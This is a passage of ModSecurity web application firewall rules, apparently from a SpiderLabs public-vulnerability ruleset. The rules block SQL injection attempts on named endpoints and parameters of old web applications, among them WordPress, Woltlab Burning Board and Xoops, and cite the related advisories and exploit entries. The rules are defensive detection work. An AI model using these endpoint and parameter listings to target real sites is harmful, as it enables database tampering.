UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006980) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php login UPDATE SecRule REQUEST_LINE "@contains /process.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006980,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php login UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4687'" SecRule &TX:'/SQL_INJECTION.*ARGS:login/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php login UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006986) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php password UPDATE SecRule REQUEST_LINE "@contains /process.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006986,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php password UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4687'" SecRule &TX:'/SQL_INJECTION.*ARGS:password/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- process.php password UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- dlwallpaper.php wallpaperid UPDATE SecRule REQUEST_LINE "@contains /dlwallpaper.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006992,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- dlwallpaper.php wallpaperid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4687'" SecRule &TX:'/SQL_INJECTION.*ARGS:wallpaperid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- dlwallpaper.php wallpaperid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006998) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- wallpaper.php wallpaperid UPDATE SecRule REQUEST_LINE "@contains /wallpaper.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006998,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- wallpaper.php wallpaperid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2835'" SecRule &TX:'/SQL_INJECTION.*ARGS:wallpaperid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wallpaper Complete Website SQL Injection Attempt -- wallpaper.php wallpaperid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007075) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WarHound General Shopping Cart SQL Injection Attempt -- item.asp ItemID UPDATE SecRule REQUEST_LINE "@contains /item.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007075,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS WarHound General Shopping Cart SQL Injection Attempt -- item.asp ItemID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21324'" SecRule &TX:'/SQL_INJECTION.*ARGS:ItemID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WarHound General Shopping Cart SQL Injection Attempt -- item.asp ItemID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004759) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- index.php strid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004759,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- index.php strid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22726'" SecRule &TX:'/SQL_INJECTION.*ARGS:strid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- index.php strid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004765) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- filecheck.php id UPDATE SecRule REQUEST_LINE "@contains /filecheck.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004765,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- filecheck.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22726'" SecRule REQUEST_LINE "@contains id[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebMplayer SQL Injection Attempt -- filecheck.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004916) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebTester SQL Injection Attempt -- directions.php testID UPDATE SecRule REQUEST_LINE "@contains /directions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004916,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WebTester SQL Injection Attempt -- directions.php testID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22559'" SecRule &TX:'/SQL_INJECTION.*ARGS:testID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebTester SQL Injection Attempt -- directions.php testID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004778) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ban SQL Injection Attempt -- connexion.php id UPDATE SecRule REQUEST_LINE "@contains /connexion.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004778,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Ban SQL Injection Attempt -- connexion.php id UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-7089'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ban SQL Injection Attempt -- connexion.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004229) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- functions_filters.asp UPDATE SecRule REQUEST_LINE "@contains /functions/functions_filters.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004229,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- functions_filters.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23051'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- functions_filters.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004234) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- pop_up_member_search.asp name UPDATE SecRule REQUEST_LINE "@contains /forum/pop_up_member_search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004234,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- pop_up_member_search.asp name UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23051'" SecRule &TX:'/SQL_INJECTION.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- pop_up_member_search.asp name UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004240) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- page.asp NewsID UPDATE SecRule REQUEST_LINE "@contains /News/page.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004240,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- page.asp NewsID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23051'" SecRule &TX:'/SQL_INJECTION.*ARGS:NewsID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Web Wiz Forums SQL Injection Attempt -- page.asp NewsID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005232) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Website Baker SQL Injection Attempt -- eWebQuiz.asp QuizID UPDATE SecRule REQUEST_LINE "@contains /eWebQuiz.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005232,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Website Baker SQL Injection Attempt -- eWebQuiz.asp QuizID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-0527'" SecRule &TX:'/SQL_INJECTION.*ARGS:QuizID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Website Baker SQL Injection Attempt -- eWebQuiz.asp QuizID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004145) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Weekly Drawing Contest SQL Injection Attempt -- check_vote.php order UPDATE SecRule REQUEST_LINE "@contains /check_vote.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004145,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Weekly Drawing Contest SQL Injection Attempt -- check_vote.php order UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/462702/100/100/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:order/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Weekly Drawing Contest SQL Injection Attempt -- check_vote.php order UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004252) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board SQL Injection Attempt -- usergroups.php UPDATE SecRule REQUEST_LINE "@contains /usergroups.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004252,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board SQL Injection Attempt -- usergroups.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22970'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board SQL Injection Attempt -- usergroups.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005002) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) Lite SQL Injection Attempt -- pms.php pmid UPDATE SecRule REQUEST_LINE "@contains /pms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005002,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) Lite SQL Injection Attempt -- pms.php pmid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3262'" SecRule REQUEST_LINE "@contains pmid[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) Lite SQL Injection Attempt -- pms.php pmid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005285) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UPDATE SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005285,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3144'" SecRule REQUEST_LINE "@contains boardids[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005291) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UPDATE SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005291,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3144'" SecRule REQUEST_LINE "@contains board[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006926) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Woltlab Burning Board Lite SQL Injection Attempt -- thread.php threadvisit UPDATE SecRule REQUEST_LINE "@contains /thread.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006926,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Woltlab Burning Board Lite SQL Injection Attempt -- thread.php threadvisit UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2841'" SecRule &TX:'/SQL_INJECTION.*ARGS:threadvisit/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Woltlab Burning Board Lite SQL Injection Attempt -- thread.php threadvisit UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004016) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004016,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule &TX:'/SQL_INJECTION.*ARGS:cookie/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004408) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UPDATE SecRule REQUEST_LINE "@contains /wp-admin/admin-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004408,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24566'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-functions.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004659,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005662) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005662,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005870) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005870,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011047) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011047,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:postid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004348) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X-Ice News System SQL Injection Attempt -- devami.asp id UPDATE SecRule REQUEST_LINE "@contains /devami.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004348,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS X-Ice News System SQL Injection Attempt -- devami.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3469'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X-Ice News System SQL Injection Attempt -- devami.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005122) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php id UPDATE SecRule REQUEST_LINE "@contains /classes/class.news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005122,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0395'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005128) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php from UPDATE SecRule REQUEST_LINE "@contains /classes/class.news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005128,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php from UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0395'" SecRule &TX:'/SQL_INJECTION.*ARGS:from/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php from UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005134) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php q UPDATE SecRule REQUEST_LINE "@contains /classes/class.news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005134,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php q UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0395'" SecRule &TX:'/SQL_INJECTION.*ARGS:q/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php q UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004862) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS XLAtunes SQL Injection Attempt -- view.php album UPDATE SecRule REQUEST_LINE "@contains /view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004862,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS XLAtunes SQL Injection Attempt -- view.php album UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3327'" SecRule &TX:'/SQL_INJECTION.*ARGS:album/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS XLAtunes SQL Injection Attempt -- view.php album UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005383) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- group.php id UPDATE SecRule REQUEST_LINE "@contains /kernel/group.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005383,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- group.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22399'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- group.php id 